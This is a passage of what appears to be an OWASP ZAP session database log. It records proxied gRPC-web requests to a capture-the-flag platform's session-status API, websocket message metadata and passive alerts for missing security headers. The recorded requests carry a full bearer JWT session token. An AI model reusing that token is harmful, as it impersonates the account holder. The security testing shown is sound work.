NAME='Date' AND USED=1 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:55 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',2,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=1 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',2,'','Caddy') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(8,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',7,7,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(19,8,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(20,8,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(8,1709346750724,1,200,1709346896918,112,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:34:57 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=2 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',3,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=1 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',2,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=2 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',3,'','h3=":443"; ma=2592000') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(9,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',8,8,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=1 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',2,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=2 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',3,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=1 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',2,'','Origin') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(21,9,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(22,9,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=2 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',3,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=1 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',2,'','129') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(10,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',8,8,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(23,10,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(24,10,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_CHANNEL VALUES(1,'zap',443,'','2024-03-02 03:34:57.550000',NULL,NULL) -COMMIT -/*C1*/SET SCHEMA SYSTEM_LOBS -INSERT INTO LOB_IDS VALUES(1,61,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 2 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=0 -INSERT INTO BLOCKS VALUES(0,1,0) -INSERT INTO BLOCKS VALUES(1,2147483646,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=0 -INSERT INTO LOBS VALUES(0,1,0,1) -COMMIT -/*C13*/INSERT INTO WEBSOCKET_MESSAGE VALUES(1,1,'2024-03-02 03:34:57.691000',1,1,NULL,61,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=1 -INSERT INTO LOB_IDS VALUES(1,61,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(2,77,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 3 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=1 -INSERT INTO BLOCKS VALUES(1,1,0) -INSERT INTO BLOCKS VALUES(2,2147483645,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=1 -INSERT INTO LOBS VALUES(1,1,0,2) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(2,1,'2024-03-02 03:34:57.707000',1,2,NULL,77,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=2 -INSERT INTO LOB_IDS VALUES(2,77,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(3,49,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 4 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=2 -INSERT INTO BLOCKS VALUES(2,1,0) -INSERT INTO BLOCKS VALUES(3,2147483644,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=2 -INSERT INTO LOBS VALUES(2,1,0,3) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(3,1,'2024-03-02 03:34:57.712000',1,3,NULL,49,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=3 -INSERT INTO LOB_IDS VALUES(3,49,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(4,120,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 5 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=3 -INSERT INTO BLOCKS VALUES(3,1,0) -INSERT INTO BLOCKS VALUES(4,2147483643,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=3 -INSERT INTO LOBS VALUES(3,1,0,4) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(4,1,'2024-03-02 03:34:57.714000',1,4,NULL,120,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=4 -INSERT INTO LOB_IDS VALUES(4,120,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(5,117,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 6 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=4 -INSERT INTO BLOCKS VALUES(4,1,0) -INSERT INTO BLOCKS VALUES(5,2147483642,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=4 -INSERT INTO LOBS VALUES(4,1,0,5) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(5,1,'2024-03-02 03:34:57.733000',1,5,NULL,117,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=5 -INSERT INTO LOB_IDS VALUES(5,117,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(6,112,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 7 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=5 -INSERT INTO BLOCKS VALUES(5,1,0) -INSERT INTO BLOCKS VALUES(6,2147483641,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=5 -INSERT INTO LOBS VALUES(5,1,0,6) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(6,1,'2024-03-02 03:34:57.735000',1,6,NULL,112,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=6 -INSERT INTO LOB_IDS VALUES(6,112,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(7,108,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 8 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=6 -INSERT INTO BLOCKS VALUES(6,1,0) -INSERT INTO BLOCKS VALUES(7,2147483640,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=6 -INSERT INTO LOBS VALUES(6,1,0,7) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(7,1,'2024-03-02 03:34:57.796000',1,7,NULL,108,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=7 -INSERT INTO LOB_IDS VALUES(7,108,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(8,118,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 9 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=7 -INSERT INTO BLOCKS VALUES(7,1,0) -INSERT INTO BLOCKS VALUES(8,2147483639,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=7 -INSERT INTO LOBS VALUES(7,1,0,8) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(8,1,'2024-03-02 03:34:57.802000',1,8,NULL,118,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=8 -INSERT INTO LOB_IDS VALUES(8,118,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(9,110,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 10 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=8 -INSERT INTO BLOCKS VALUES(8,1,0) -INSERT INTO BLOCKS VALUES(9,2147483638,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=8 -INSERT INTO LOBS VALUES(8,1,0,9) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(9,1,'2024-03-02 03:34:57.805000',1,9,NULL,110,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=9 -INSERT INTO LOB_IDS VALUES(9,110,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(10,130,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 11 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=9 -INSERT INTO BLOCKS VALUES(9,1,0) -INSERT INTO BLOCKS VALUES(10,2147483637,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=9 -INSERT INTO LOBS VALUES(9,1,0,10) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(10,1,'2024-03-02 03:34:57.814000',1,10,NULL,130,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=10 -INSERT INTO LOB_IDS VALUES(10,130,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(11,114,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 12 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=10 -INSERT INTO BLOCKS VALUES(10,1,0) -INSERT INTO BLOCKS VALUES(11,2147483636,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=10 -INSERT INTO LOBS VALUES(10,1,0,11) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(11,1,'2024-03-02 03:34:57.822000',1,11,NULL,114,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=11 -INSERT INTO LOB_IDS VALUES(11,114,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(12,106,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 13 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=11 -INSERT INTO BLOCKS VALUES(11,1,0) -INSERT INTO BLOCKS VALUES(12,2147483635,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=11 -INSERT INTO LOBS VALUES(11,1,0,12) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(12,1,'2024-03-02 03:34:57.823000',1,12,NULL,106,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=12 -INSERT INTO LOB_IDS VALUES(12,106,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(13,201,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 14 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=12 -INSERT INTO BLOCKS VALUES(12,1,0) -INSERT INTO BLOCKS VALUES(13,2147483634,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=12 -INSERT INTO LOBS VALUES(12,1,0,13) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(13,1,'2024-03-02 03:34:57.951000',1,13,NULL,201,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=13 -INSERT INTO LOB_IDS VALUES(13,201,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(14,960,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 15 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=13 -INSERT INTO BLOCKS VALUES(13,1,0) -INSERT INTO BLOCKS VALUES(14,2147483633,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=13 -INSERT INTO LOBS VALUES(13,1,0,14) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(14,1,'2024-03-02 03:34:57.960000',1,14,NULL,960,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=14 -INSERT INTO LOB_IDS VALUES(14,960,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(15,176,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 16 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=14 -INSERT INTO BLOCKS VALUES(14,1,0) -INSERT INTO BLOCKS VALUES(15,2147483632,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=14 -INSERT INTO LOBS VALUES(14,1,0,15) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(15,1,'2024-03-02 03:34:57.963000',1,15,NULL,176,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=15 -INSERT INTO LOB_IDS VALUES(15,176,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(16,1653,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 17 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=15 -INSERT INTO BLOCKS VALUES(15,1,0) -INSERT INTO BLOCKS VALUES(16,2147483631,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=15 -INSERT INTO LOBS VALUES(15,1,0,16) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(16,1,'2024-03-02 03:34:57.972000',1,16,NULL,1653,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=16 -INSERT INTO LOB_IDS VALUES(16,1653,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(9,1709346750724,1,200,1709346898617,348,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:34:58 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(17,322,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 18 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=16 -INSERT INTO BLOCKS VALUES(16,1,0) -INSERT INTO BLOCKS VALUES(17,2147483630,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=16 -INSERT INTO LOBS VALUES(16,1,0,17) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(17,1,'2024-03-02 03:34:58.973000',1,17,NULL,322,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=17 -INSERT INTO LOB_IDS VALUES(17,322,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=3 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',4,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=2 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',3,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=3 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',4,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=2 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',3,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=3 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',4,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=2 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',3,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=3 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',4,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=2 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',3,'','129') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(11,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',9,9,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(25,11,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(26,11,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(18,551,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 19 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=17 -INSERT INTO BLOCKS VALUES(17,1,0) -INSERT INTO BLOCKS VALUES(18,2147483629,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=17 -INSERT INTO LOBS VALUES(17,1,0,18) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(18,1,'2024-03-02 03:34:59.177000',1,18,NULL,551,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=18 -INSERT INTO LOB_IDS VALUES(18,551,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(12,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of 